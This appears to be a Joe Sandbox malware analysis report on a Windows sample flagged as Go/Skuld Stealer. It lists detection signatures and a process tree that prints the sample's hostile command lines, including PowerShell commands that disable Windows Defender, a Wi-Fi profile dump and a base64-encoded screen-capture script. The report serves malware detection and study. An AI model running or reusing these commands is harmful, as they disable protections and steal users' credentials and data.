Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WdlA0C4PkO.exe

Overview

General Information

Sample name:WdlA0C4PkO.exe
renamed because original name is a hash value
Original sample name:2b344d8644f0d502c4c8370ef8674a51.exe
Analysis ID:1577903
MD5:2b344d8644f0d502c4c8370ef8674a51
SHA1:d14f20eaf8ea75d6f10c85e2b18fb1d0ee8781da
SHA256:bc1b77f9680b9028efd499e3e741d46db003f5470a8b61d21e445eaeb7141045
Tags:exeuser-abuse_ch
Infos:

Detection

Go Stealer, Skuld Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Go Stealer
Yara detected Skuld Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal communication platform credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • WdlA0C4PkO.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\WdlA0C4PkO.exe" MD5: 2B344D8644F0D502C4C8370EF8674A51)
    • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7752 cmdline: attrib +h +s C:\Users\user\Desktop\WdlA0C4PkO.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • attrib.exe (PID: 7772 cmdline: attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • WMIC.exe (PID: 7828 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 7896 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • powershell.exe (PID: 7940 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • WMIC.exe (PID: 7964 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 8072 cmdline: wmic cpu get Name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 8156 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • powershell.exe (PID: 7332 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
    • WMIC.exe (PID: 6684 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • netsh.exe (PID: 7496 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • powershell.exe (PID: 7668 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 3556 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7772 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41CB.tmp" "c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • attrib.exe (PID: 2572 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • attrib.exe (PID: 2968 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • SecurityHealthSystray.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: 2B344D8644F0D502C4C8370EF8674A51)
    • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SecurityHealthSystray.exe (PID: 3348 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: 2B344D8644F0D502C4C8370EF8674A51)
    • conhost.exe (PID: 604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_GoStealerYara detected Go StealerJoe Security
    0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_SkuldStealerYara detected Skuld StealerJoe Security
        00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_GoStealerYara detected Go StealerJoe Security
          00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            22.2.SecurityHealthSystray.exe.280000.0.unpackJoeSecurity_GoStealerYara detected Go StealerJoe Security
              22.2.SecurityHealthSystray.exe.280000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                22.2.SecurityHealthSystray.exe.280000.0.unpackJoeSecurity_SkuldStealerYara detected Skuld StealerJoe Security
                  13.2.SecurityHealthSystray.exe.280000.0.unpackJoeSecurity_GoStealerYara detected Go StealerJoe Security
                    13.2.SecurityHealthSystray.exe.280000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7648, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7940, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Disable Scan Feature
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7332, ProcessName: powershell.exe
                      Sigma detected: Suspicious Encoded PowerShell Command Line
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Sigma detected: Suspicious PowerShell Encoded Command Patterns
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Sigma detected: Change PowerShell Policies to an Insecure Level
